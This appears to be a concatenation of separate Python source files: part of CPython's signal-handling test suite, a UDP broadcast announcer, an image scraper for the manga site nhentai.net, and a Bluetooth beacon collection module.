raise AssertionError("second set_wakeup_fd() test failed, "
"stderr: %r" % err)
""".format(action=action)
assert_python_ok('-c', code)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
@unittest.skipUnless(hasattr(signal, 'siginterrupt'), "needs signal.siginterrupt()")
class SiginterruptTest(unittest.TestCase):
def readpipe_interrupted(self, interrupt):
"""Perform a read during which a signal will arrive. Return True if the
read is interrupted by the signal and raises an exception. Return False
if it returns normally.
"""
# use a subprocess to have only one thread, to have a timeout on the
# blocking read and to not touch signal handling in this process
code = """if 1:
import errno
import os
import signal
import sys
interrupt = %r
r, w = os.pipe()
def handler(signum, frame):
1 / 0
signal.signal(signal.SIGALRM, handler)
if interrupt is not None:
signal.siginterrupt(signal.SIGALRM, interrupt)
print("ready")
sys.stdout.flush()
# run the test twice
try:
for loop in range(2):
# send a SIGALRM in a second (during the read)
signal.alarm(1)
try:
# blocking call: read from a pipe without data
os.read(r, 1)
except ZeroDivisionError:
pass
else:
sys.exit(2)
sys.exit(3)
finally:
os.close(r)
os.close(w)
""" % (interrupt,)
with spawn_python('-c', code) as process:
try:
# wait until the child process is loaded and has started
first_line = process.stdout.readline()
stdout, stderr = process.communicate(timeout=support.SHORT_TIMEOUT)
except subprocess.TimeoutExpired:
process.kill()
return False
else:
stdout = first_line + stdout
exitcode = process.wait()
if exitcode not in (2, 3):
raise Exception("Child error (exit code %s): %r"
% (exitcode, stdout))
return (exitcode == 3)
def test_without_siginterrupt(self):
# If a signal handler is installed and siginterrupt is not called
# at all, when that signal arrives, it interrupts a syscall that's in
# progress.
interrupted = self.readpipe_interrupted(None)
self.assertTrue(interrupted)
def test_siginterrupt_on(self):
# If a signal handler is installed and siginterrupt is called with
# a true value for the second argument, when that signal arrives, it
# interrupts a syscall that's in progress.
interrupted = self.readpipe_interrupted(True)
self.assertTrue(interrupted)
def test_siginterrupt_off(self):
# If a signal handler is installed and siginterrupt is called with
# a false value for the second argument, when that signal arrives, it
# does not interrupt a syscall that's in progress.
interrupted = self.readpipe_interrupted(False)
self.assertFalse(interrupted)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
@unittest.skipUnless(hasattr(signal, 'getitimer') and hasattr(signal, 'setitimer'),
"needs signal.getitimer() and signal.setitimer()")
class ItimerTest(unittest.TestCase):
def setUp(self):
self.hndl_called = False
self.hndl_count = 0
self.itimer = None
self.old_alarm = signal.signal(signal.SIGALRM, self.sig_alrm)
def tearDown(self):
signal.signal(signal.SIGALRM, self.old_alarm)
if self.itimer is not None: # test_itimer_exc doesn't change this attr
# just ensure that itimer is stopped
signal.setitimer(self.itimer, 0)
def sig_alrm(self, *args):
self.hndl_called = True
def sig_vtalrm(self, *args):
self.hndl_called = True
if self.hndl_count > 3:
# it shouldn't be here, because it should have been disabled.
raise signal.ItimerError("setitimer didn't disable ITIMER_VIRTUAL "
"timer.")
elif self.hndl_count == 3:
# disable ITIMER_VIRTUAL, this function shouldn't be called anymore
signal.setitimer(signal.ITIMER_VIRTUAL, 0)
self.hndl_count += 1
def sig_prof(self, *args):
self.hndl_called = True
signal.setitimer(signal.ITIMER_PROF, 0)
def test_itimer_exc(self):
# XXX I'm assuming -1 is an invalid itimer, but maybe some platform
# defines it ?
self.assertRaises(signal.ItimerError, signal.setitimer, -1, 0)
# Negative times are treated as zero on some platforms.
if 0:
self.assertRaises(signal.ItimerError,
signal.setitimer, signal.ITIMER_REAL, -1)
def test_itimer_real(self):
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1.0)
signal.pause()
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform in ('netbsd5',),
'itimer not reliable (does not mix well with threading) on some BSDs.')
def test_itimer_virtual(self):
self.itimer = signal.ITIMER_VIRTUAL
signal.signal(signal.SIGVTALRM, self.sig_vtalrm)
signal.setitimer(self.itimer, 0.3, 0.2)
start_time = time.monotonic()
while time.monotonic() - start_time < 60.0:
# use up some virtual time by doing real work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_vtalrm handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# virtual itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
def test_itimer_prof(self):
self.itimer = signal.ITIMER_PROF
signal.signal(signal.SIGPROF, self.sig_prof)
signal.setitimer(self.itimer, 0.2, 0.2)
start_time = time.monotonic()
while time.monotonic() - start_time < 60.0:
# do some work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_prof handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# profiling itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
def test_setitimer_tiny(self):
# bpo-30807: C setitimer() takes a microsecond-resolution interval.
# Check that float -> timeval conversion doesn't round
# the interval down to zero, which would disable the timer.
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1e-6)
time.sleep(1)
self.assertEqual(self.hndl_called, True)
class PendingSignalsTests(unittest.TestCase):
"""
Test pthread_sigmask(), pthread_kill(), sigpending() and sigwait()
functions.
"""
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending_empty(self):
self.assertEqual(signal.sigpending(), set())
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending(self):
code = """if 1:
import os
import signal
def handler(signum, frame):
1/0
signum = signal.SIGUSR1
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
os.kill(os.getpid(), signum)
pending = signal.sigpending()
for sig in pending:
assert isinstance(sig, signal.Signals), repr(pending)
if pending != {signum}:
raise Exception('%s != {%s}' % (pending, signum))
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill(self):
code = """if 1:
import signal
import threading
import sys
signum = signal.SIGUSR1
def handler(signum, frame):
1/0
signal.signal(signum, handler)
tid = threading.get_ident()
try:
signal.pthread_kill(tid, signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def wait_helper(self, blocked, test):
"""
test: body of the "def test(signum):" function.
blocked: number of the blocked signal
"""
code = '''if 1:
import signal
import sys
from signal import Signals
def handler(signum, frame):
1/0
%s
blocked = %r
signum = signal.SIGALRM
# child: block and wait the signal
try:
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [blocked])
# Do the tests
test(signum)
# The handler must not be called on unblock
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [blocked])
except ZeroDivisionError:
print("the signal handler has been called",
file=sys.stderr)
sys.exit(1)
except BaseException as err:
print("error: {}".format(err), file=sys.stderr)
sys.stderr.flush()
sys.exit(1)
''' % (test.strip(), blocked)
# sig*wait* must be called with the signal blocked: since the current
# process might have several threads running, use a subprocess to have
# a single thread.
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
def test_sigwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
received = signal.sigwait([signum])
assert isinstance(received, signal.Signals), received
if received != signum:
raise Exception('received %s, not %s' % (received, signum))
''')
@unittest.skipUnless(hasattr(signal, 'sigwaitinfo'),
'need signal.sigwaitinfo()')
def test_sigwaitinfo(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigwaitinfo([signum])
if info.si_signo != signum:
raise Exception("info.si_signo != %s" % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigtimedwait([signum], 10.1000)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_poll(self):
# check that polling with sigtimedwait works
self.wait_helper(signal.SIGALRM, '''
def test(signum):
import os
os.kill(os.getpid(), signum)
info = signal.sigtimedwait([signum], 0)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_timeout(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
received = signal.sigtimedwait([signum], 1.0)
if received is not None:
raise Exception("received=%r" % (received,))
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_negative_timeout(self):
signum = signal.SIGALRM
self.assertRaises(ValueError, signal.sigtimedwait, [signum], -1.0)
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_sigwait_thread(self):
# Check that calling sigwait() from a thread doesn't suspend the whole
# process. A new interpreter is spawned to avoid problems when mixing
# threads and fork(): only async-safe functions are allowed between
# fork() and exec().
assert_python_ok("-c", """if True:
import os, threading, sys, time, signal
# the default handler terminates the process
signum = signal.SIGUSR1
def kill_later():
# wait until the main thread is waiting in sigwait()
time.sleep(1)
os.kill(os.getpid(), signum)
# the signal must be blocked by all the threads
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
killer = threading.Thread(target=kill_later)
killer.start()
received = signal.sigwait([signum])
if received != signum:
print("sigwait() received %s, not %s" % (received, signum),
file=sys.stderr)
sys.exit(1)
killer.join()
# unblock the signal, which should have been cleared by sigwait()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
""")
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask_arguments(self):
self.assertRaises(TypeError, signal.pthread_sigmask)
self.assertRaises(TypeError, signal.pthread_sigmask, 1)
self.assertRaises(TypeError, signal.pthread_sigmask, 1, 2, 3)
self.assertRaises(OSError, signal.pthread_sigmask, 1700, [])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.NSIG])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [0])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [1<<1000])
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask_valid_signals(self):
s = signal.pthread_sigmask(signal.SIG_BLOCK, signal.valid_signals())
self.addCleanup(signal.pthread_sigmask, signal.SIG_SETMASK, s)
# Get current blocked set
s = signal.pthread_sigmask(signal.SIG_UNBLOCK, signal.valid_signals())
self.assertLessEqual(s, signal.valid_signals())
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask(self):
code = """if 1:
import signal
import os; import threading
def handler(signum, frame):
1/0
def kill(signum):
os.kill(os.getpid(), signum)
def check_mask(mask):
for sig in mask:
assert isinstance(sig, signal.Signals), repr(sig)
def read_sigmask():
sigmask = signal.pthread_sigmask(signal.SIG_BLOCK, [])
check_mask(sigmask)
return sigmask
signum = signal.SIGUSR1
# Install our signal handler
old_handler = signal.signal(signum, handler)
# Unblock SIGUSR1 (and copy the old mask) to test our signal handler
old_mask = signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
check_mask(old_mask)
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Block and then raise SIGUSR1. The signal is blocked: the signal
# handler is not called, and the signal is now pending
mask = signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
check_mask(mask)
kill(signum)
# Check the new mask
blocked = read_sigmask()
check_mask(blocked)
if signum not in blocked:
raise Exception("%s not in %s" % (signum, blocked))
if old_mask ^ blocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (old_mask, blocked, signum))
# Unblock SIGUSR1
try:
# unblock the pending signal calls immediately the signal handler
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Check the new mask
unblocked = read_sigmask()
if signum in unblocked:
raise Exception("%s in %s" % (signum, unblocked))
if blocked ^ unblocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (blocked, unblocked, signum))
if old_mask != unblocked:
raise Exception("%s != %s" % (old_mask, unblocked))
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill_main_thread(self):
# Test that a signal can be sent to the main thread with pthread_kill()
# before any other thread has been created (see issue #12392).
code = """if True:
import threading
import signal
import sys
def handler(signum, frame):
sys.exit(3)
signal.signal(signal.SIGUSR1, handler)
signal.pthread_kill(threading.get_ident(), signal.SIGUSR1)
sys.exit(2)
"""
with spawn_python('-c', code) as process:
stdout, stderr = process.communicate()
exitcode = process.wait()
if exitcode != 3:
raise Exception("Child error (exit code %s): %s" %
(exitcode, stdout))
class StressTest(unittest.TestCase):
"""
Stress signal delivery, especially when a signal arrives in
the middle of recomputing the signal state or executing
previously tripped signal handlers.
"""
def setsig(self, signum, handler):
old_handler = signal.signal(signum, handler)
self.addCleanup(signal.signal, signum, old_handler)
def measure_itimer_resolution(self):
N = 20
times = []
def handler(signum=None, frame=None):
if len(times) < N:
times.append(time.perf_counter())
# 1 µs is the smallest possible timer interval,
# we want to measure what the concrete duration
# will be on this platform
signal.setitimer(signal.ITIMER_REAL, 1e-6)
self.addCleanup(signal.setitimer, signal.ITIMER_REAL, 0)
self.setsig(signal.SIGALRM, handler)
handler()
while len(times) < N:
time.sleep(1e-3)
durations = [times[i+1] - times[i] for i in range(len(times) - 1)]
med = statistics.median(durations)
if support.verbose:
print("detected median itimer() resolution: %.6f s." % (med,))
return med
def decide_itimer_count(self):
# Some systems have poor setitimer() resolution (for example
# measured around 20 ms. on FreeBSD 9), so decide on a reasonable
# number of sequential timers based on that.
reso = self.measure_itimer_resolution()
if reso <= 1e-4:
return 10000
elif reso <= 1e-2:
return 100
else:
self.skipTest("detected itimer resolution (%.3f s.) too high "
"(> 10 ms.) on this platform (or system too busy)"
% (reso,))
@unittest.skipUnless(hasattr(signal, "setitimer"),
"test needs setitimer()")
def test_stress_delivery_dependent(self):
"""
This test uses dependent signal handlers.
"""
N = self.decide_itimer_count()
sigs = []
def first_handler(signum, frame):
# 1e-6 is the minimum non-zero value for `setitimer()`.
# Choose a random delay so as to improve chances of
# triggering a race condition. Ideally the signal is received
# when inside critical signal-handling routines such as
# Py_MakePendingCalls().
signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5)
def second_handler(signum=None, frame=None):
sigs.append(signum)
# Here on Linux, SIGPROF > SIGALRM > SIGUSR1. By using both
# ascending and descending sequences (SIGUSR1 then SIGALRM,
# SIGPROF then SIGALRM), we maximize chances of hitting a bug.
self.setsig(signal.SIGPROF, first_handler)
self.setsig(signal.SIGUSR1, first_handler)
self.setsig(signal.SIGALRM, second_handler) # for ITIMER_REAL
expected_sigs = 0
deadline = time.monotonic() + support.SHORT_TIMEOUT
while expected_sigs < N:
os.kill(os.getpid(), signal.SIGPROF)
expected_sigs += 1
# Wait for handlers to run to avoid signal coalescing
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
os.kill(os.getpid(), signal.SIGUSR1)
expected_sigs += 1
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
# All ITIMER_REAL signals should have been delivered to the
# Python handler
self.assertEqual(len(sigs), N, "Some signals were lost")
@unittest.skipUnless(hasattr(signal, "setitimer"),
"test needs setitimer()")
def test_stress_delivery_simultaneous(self):
"""
This test uses simultaneous signal handlers.
"""
N = self.decide_itimer_count()
sigs = []
def handler(signum, frame):
sigs.append(signum)
self.setsig(signal.SIGUSR1, handler)
self.setsig(signal.SIGALRM, handler) # for ITIMER_REAL
expected_sigs = 0
deadline = time.monotonic() + support.SHORT_TIMEOUT
while expected_sigs < N:
# Hopefully the SIGALRM will be received somewhere during
# initial processing of SIGUSR1.
signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5)
os.kill(os.getpid(), signal.SIGUSR1)
expected_sigs += 2
# Wait for handlers to run to avoid signal coalescing
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
# All ITIMER_REAL signals should have been delivered to the
# Python handler
self.assertEqual(len(sigs), N, "Some signals were lost")
@unittest.skipUnless(hasattr(signal, "SIGUSR1"),
"test needs SIGUSR1")
def test_stress_modifying_handlers(self):
# bpo-43406: race condition between trip_signal() and signal.signal
signum = signal.SIGUSR1
num_sent_signals = 0
num_received_signals = 0
do_stop = False
def custom_handler(signum, frame):
nonlocal num_received_signals
num_received_signals += 1
def set_interrupts():
nonlocal num_sent_signals
while not do_stop:
signal.raise_signal(signum)
num_sent_signals += 1
def cycle_handlers():
while num_sent_signals < 100:
for i in range(20000):
# Cycle between a Python-defined and a non-Python handler
for handler in [custom_handler, signal.SIG_IGN]:
signal.signal(signum, handler)
old_handler = signal.signal(signum, custom_handler)
self.addCleanup(signal.signal, signum, old_handler)
t = threading.Thread(target=set_interrupts)
try:
ignored = False
with support.catch_unraisable_exception() as cm:
t.start()
cycle_handlers()
do_stop = True
t.join()
if cm.unraisable is not None:
# An unraisable exception may be printed out when
# a signal is ignored due to the aforementioned
# race condition, check it.
self.assertIsInstance(cm.unraisable.exc_value, OSError)
self.assertIn(
f"Signal {signum:d} ignored due to race condition",
str(cm.unraisable.exc_value))
ignored = True
# bpo-43406: Even if it is unlikely, it's technically possible that
# all signals were ignored because of race conditions.
if not ignored:
# Sanity check that some signals were received, but not all
self.assertGreater(num_received_signals, 0)
self.assertLess(num_received_signals, num_sent_signals)
finally:
do_stop = True
t.join()
class RaiseSignalTest(unittest.TestCase):
def test_sigint(self):
with self.assertRaises(KeyboardInterrupt):
signal.raise_signal(signal.SIGINT)
@unittest.skipIf(sys.platform != "win32", "Windows specific test")
def test_invalid_argument(self):
try:
SIGHUP = 1 # not supported on win32
signal.raise_signal(SIGHUP)
self.fail("OSError (Invalid argument) expected")
except OSError as e:
if e.errno == errno.EINVAL:
pass
else:
raise
def test_handler(self):
is_ok = False
def handler(a, b):
nonlocal is_ok
is_ok = True
old_signal = signal.signal(signal.SIGINT, handler)
self.addCleanup(signal.signal, signal.SIGINT, old_signal)
signal.raise_signal(signal.SIGINT)
self.assertTrue(is_ok)
class PidfdSignalTest(unittest.TestCase):
@unittest.skipUnless(
hasattr(signal, "pidfd_send_signal"),
"pidfd support not built in",
)
def test_pidfd_send_signal(self):
with self.assertRaises(OSError) as cm:
signal.pidfd_send_signal(0, signal.SIGINT)
if cm.exception.errno == errno.ENOSYS:
self.skipTest("kernel does not support pidfds")
elif cm.exception.errno == errno.EPERM:
self.skipTest("Not enough privileges to use pidfs")
self.assertEqual(cm.exception.errno, errno.EBADF)
my_pidfd = os.open(f'/proc/{os.getpid()}', os.O_DIRECTORY)
self.addCleanup(os.close, my_pidfd)
with self.assertRaisesRegex(TypeError, "^siginfo must be None$"):
signal.pidfd_send_signal(my_pidfd, signal.SIGINT, object(), 0)
with self.assertRaises(KeyboardInterrupt):
signal.pidfd_send_signal(my_pidfd, signal.SIGINT)
def tearDownModule():
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
UdpBroadcaster.py
|
import os
import sys
import logging
import socket
import threading
import time
import datetime
import psutil
#import netifaces
import Controller
class UdpBroadcaster(Controller.Controller):
DEBUG_INTERVAL = 5 * 60 # 5 minutes
def __init__(self, name, port, delay, log_level):
self.name = name
self.port = port
self.delay = delay
self.logger = logging.getLogger(name)
self.logger.setLevel(log_level)
self.shutdown = False
self.last_debug_dt = None
def start(self):
self.logger.debug("Starting port=%s", self.port)
try:
self.run_thread = threading.Thread(target=self.run,args=())
self.run_thread.start()
except socket.error as ex:
self.shutdown = True
self.logger.error("start ex=%s", ex)
def stop(self):
self.logger.debug("stopping....")
self.shutdown = True
self.logger.debug("join th:%s run_thread", self.run_thread.getName())
self.run_thread.join()
self.logger.debug("stopped")
def run(self):
self.logger.debug("running....")
try:
while not self.shutdown:
self.broadcast()
time.sleep(self.delay)
except Exception as ex:
self.shutdown = True
self.logger.error("run ex=%s", ex)
self.logger.debug("terminated")
def broadcast(self):
addresses = self.get_valid_ip4_addresses()
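        # Log the discovered addresses at most once every DEBUG_INTERVAL seconds;
        # the sentinel value below forces the very first pass to log.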
ds = 1917 if self.last_debug_dt is None else (datetime.datetime.now()-self.last_debug_dt).total_seconds()
if ds>=self.DEBUG_INTERVAL:
self.logger.debug("broadcaster ip4 addresses found:%s", addresses)
self.last_debug_dt = datetime.datetime.now()
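        # Open a short-lived UDP socket with SO_BROADCAST enabled and a small
        # send timeout; it is closed again after one round of messages.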
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.settimeout(0.2)
hostname = socket.gethostname()
for addr in addresses:
#message = "{}||{}-Server||{}||{}".format(type, hostname, addr, port)
message = self.get_message(hostname, addr)
sock.sendto(bytes(message, "utf8"), ("<broadcast>",self.port))
time.sleep(0.1)
sock.close()
def get_message(self, hostname, addr):
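        # Placeholder payload; subclasses are presumably meant to override
        # get_message() with their own discovery message format.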
return "Hello world"
#def get_ip_addresses_using_netifaces(family=netifaces.AF_INET):
# ip_list = []
# for interface in netifaces.interfaces():
# links = netifaces.ifaddresses(interface)
#
# for link in ifaddresses(interface)[family]:
# ip_list.append(link["addr"])
# return ip_list
def get_ip_addresses(self, family=socket.AF_INET):
for interface, snics in psutil.net_if_addrs().items():
for snic in snics:
if snic.family == family:
yield (interface, snic.address)
def get_valid_ip4_addresses(self):
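        # Drop loopback (127.x.x.x) and link-local/APIPA (169.254.x.x) addresses.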
return [s[1] for s in self.get_ip_addresses() if not s[1].startswith(("127.", "169.254."))]
def test():
logging.basicConfig(format="%(process)d-%(levelname)s-%(message)s", level=logging.DEBUG)
logging.info("Starting... platform=%s", sys.platform)
    broadcaster = UdpBroadcaster("TestUdpBroadcaster", 4242, 3, logging.DEBUG)
broadcaster.start()
input("Press Enter to continue...")
broadcaster.stop()
if __name__ == "__main__":
test()
|
Nhentai.py
|
import requests
from bs4 import BeautifulSoup
import sys
from Site import Common
from time import sleep
import threading
import queue
class Nhentai:
def __init__(self, url):
self.title=''#
self.chapters=['']
#initial author only for title page
self.author=''#
#the h1 tag
self.temp=[]
self.rawstoryhtml=['']
self.truestoryhttml=[]
self.length=1
self.pbar=None
self.url=url
self.images=[] #testing images
self.hasimages = True
self.isize=0
self.duplicate = False
self.queue = queue.Queue()
page = Common.RequestPage(url)
if page is None:
print('Could not complete request for page: ' + url)
return None
soup=BeautifulSoup(page.content, 'html.parser')
self.title = soup.find('meta', attrs={'itemprop':'name'}).get('content')
if Common.dup:
if Common.CheckDuplicate(self.title):
self.duplicate = True
return None
for au in soup.find_all('div', attrs={'class':'tag-container'}):
#print('HERE1')
for au2 in au.find_all('a'):
#print('HERE2')
if au2.get('href')[:7]=='/artist':
#print('HERE')
self.author=au2.get('href')[8:-1]
#print(self.author)
Common.prnt(self.title+' by '+self.author)
self.truestoryhttml.append('')
self.isize=len(soup.find_all('a', attrs={'rel':'nofollow'}))
if any(x in ('html', 'HTML', 'txt', 'TXT') for x in Common.opf):
self.pbar = Common.Progress(self.isize)
for i in soup.find_all('a', attrs={'rel':'nofollow'}):
self.GetURLS(i.get('href'))
break
self.AddPage()
if any(x in ('txt', 'html', 'TXT', 'HTML') for x in Common.opf) and Common.mt:
for i in range(0, len(self.images)):
self.queue.get()
if self.pbar is not None:
self.pbar.End()
def GetURLS(self, url):
page=Common.RequestPage('https://nhentai.net'+url.rstrip(), headers={'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)'})
if page is None:
print('Could not complete request for page: ' + url)
return None
soup=BeautifulSoup(page.content, 'html.parser')
try:
thisimage=soup.find('section', attrs={'id':'image-container'}).find('img').get('src')
self.images.append(thisimage)
        except Exception:
            print('Error in: ' + url)
            return None
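        # The remaining pages are assumed to share the first image's naming
        # scheme, so their URLs are derived by swapping in the page number.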
for i in range(2, self.isize+1):
self.images.append(thisimage[:-5]+str(i)+thisimage[-4:])
def AddPage(self):
i = 1
for thisimage in self.images:
#print(thisimage)
if any(x in ('html', 'HTML', 'epub', 'EPUB') for x in Common.opf):
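                # Zero-pad the page number so the <img> reference presumably
                # matches the filename written for this page by Common.imageDL.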
zeros = '0' * (len(str(self.isize))-1)
num = i
if len(zeros)>1 and num > 9:
zeros='0'
elif len(zeros)==1 and num > 9:
zeros = ''
if num > 99:
zeros = ''
self.truestoryhttml[0]=self.truestoryhttml[0]+'<p><img src="'+zeros+str(num)+'.jpg" /></p>\n'
if any(x in ('html', 'HTML', 'txt', 'TXT') for x in Common.opf):
if Common.mt:
t=threading.Thread(target=Common.imageDL, args=(self.title, thisimage, i, self.isize, self.pbar, self.queue), daemon=False)
t.start()
else:
Common.imageDL(self.title, thisimage, i, self.isize, self.pbar)
i+=1
|
collectionPoint.py
|
"""
BTLE iBeacon collection module
WIP
RegisteredClientRegistery manages the list of clients that are in rage
event manager controllers and handles events and figures out if the event needs to be handled and put in the list of registered clients
"""
import sys
sys.path.append('./collection_modules/btleCollectionPoint/devices/bluegiga')
sys.path.append('./collection_modules/btleCollectionPoint/libs')
from simplesensor.collection_modules.btle_beacon import moduleConfigLoader as configLoader
from devices.bluegiga.btleThread import BlueGigaBtleCollectionPointThread
from .registeredClientRegistry import RegisteredClientRegistry
from simplesensor.shared import ThreadsafeLogger, ModuleProcess
from .repeatedTimer import RepeatedTimer
from .eventManager import EventManager
from threading import Thread
import multiprocessing as mp
import time
class BtleCollectionPoint(ModuleProcess):
def __init__(self, baseConfig, pInBoundQueue, pOutBoundQueue, loggingQueue):
""" Initialize new CamCollectionPoint instance.
Setup queues, variables, configs, constants and loggers.
"""
super(BtleCollectionPoint, self).__init__()
self.loggingQueue = loggingQueue
self.logger = ThreadsafeLogger(loggingQueue, __name__)
# Queues
self.outQueue = pOutBoundQueue # Messages from this thread to the main process
self.inQueue = pInBoundQueue
self.queueBLE = mp.Queue()
# Configs
self.moduleConfig = configLoader.load(self.loggingQueue)
self.config = baseConfig
# Variables and objects
self.registeredClientRegistry = RegisteredClientRegistry(self.moduleConfig, self.loggingQueue)
self.eventManager = EventManager(self.moduleConfig, pOutBoundQueue, self.registeredClientRegistry, self.loggingQueue)
self.alive = True
self.btleThread = None
self.BLEThread = None
self.repeatTimerSweepClients = None
# Constants
self._cleanupInterval = self.moduleConfig['AbandonedClientCleanupInterval']
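        # The cleanup interval is configured in milliseconds; it is converted
        # to seconds when the RepeatedTimer is created in run().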
def run(self):
###Pausing Startup to wait for things to start after a system restart
self.logger.info("Pausing execution 15 seconds waiting for other system services to start")
time.sleep(15)
self.logger.info("Done with our nap. Time to start looking for clients")
self.btleThread = BlueGigaBtleCollectionPointThread(self.queueBLE, self.moduleConfig, self.loggingQueue)
self.BLEThread = Thread(target=self.btleThread.bleDetect, args=(__name__,10))
self.BLEThread.daemon = True
self.BLEThread.start()
# Setup repeat task to run the sweep every X interval
self.repeatTimerSweepClients = RepeatedTimer((self._cleanupInterval/1000), self.registeredClientRegistry.sweepOldClients)
# Process queue from main thread for shutdown messages
self.threadProcessQueue = Thread(target=self.processQueue)
        self.threadProcessQueue.daemon = True
self.threadProcessQueue.start()
        # Read the BLE queue; sleep briefly when it is empty to avoid busy-waiting.
        while self.alive:
            if not self.queueBLE.empty():
                result = self.queueBLE.get(block=False)
                self.__handleBtleClientEvents(result)
            else:
                time.sleep(0.1)
def processQueue(self):
self.logger.info("Starting to watch collection point inbound message queue")
while self.alive:
if not self.inQueue.empty():
self.logger.info("Queue size is %s" % self.inQueue.qsize())
try:
message = self.inQueue.get(block=False,timeout=1)
if message is not None:
if (message.topic=="SHUTDOWN" and message.sender_id=='main'):
self.logger.info("SHUTDOWN command handled on %s" % __name__)
self.shutdown()
else:
self.handleMessage(message)
except Exception as e:
self.logger.error("Unable to read queue, error: %s " %e)
self.shutdown()
self.logger.info("Queue size is %s after" % self.inQueue.qsize())
else:
time.sleep(.25)
def __handleBtleClientEvents(self, detectedClients):
for client in detectedClients:
self.logger.debug("--- Found client ---")
self.logger.debug(vars(client))
self.logger.debug("--- Found client end ---")
self.eventManager.registerDetectedClient(client)
def handleMessage(self, msg):
# Handle incoming messages, eg. from other collection points
pass
def shutdown(self):
self.logger.info("Shutting down")
self.repeatTimerSweepClients.stop()
self.btleThread.stop()
self.alive = False
time.sleep(1)
self.exit = True
|
app.py
|
import logging
import time
from threading import Thread
from flask import Blueprint
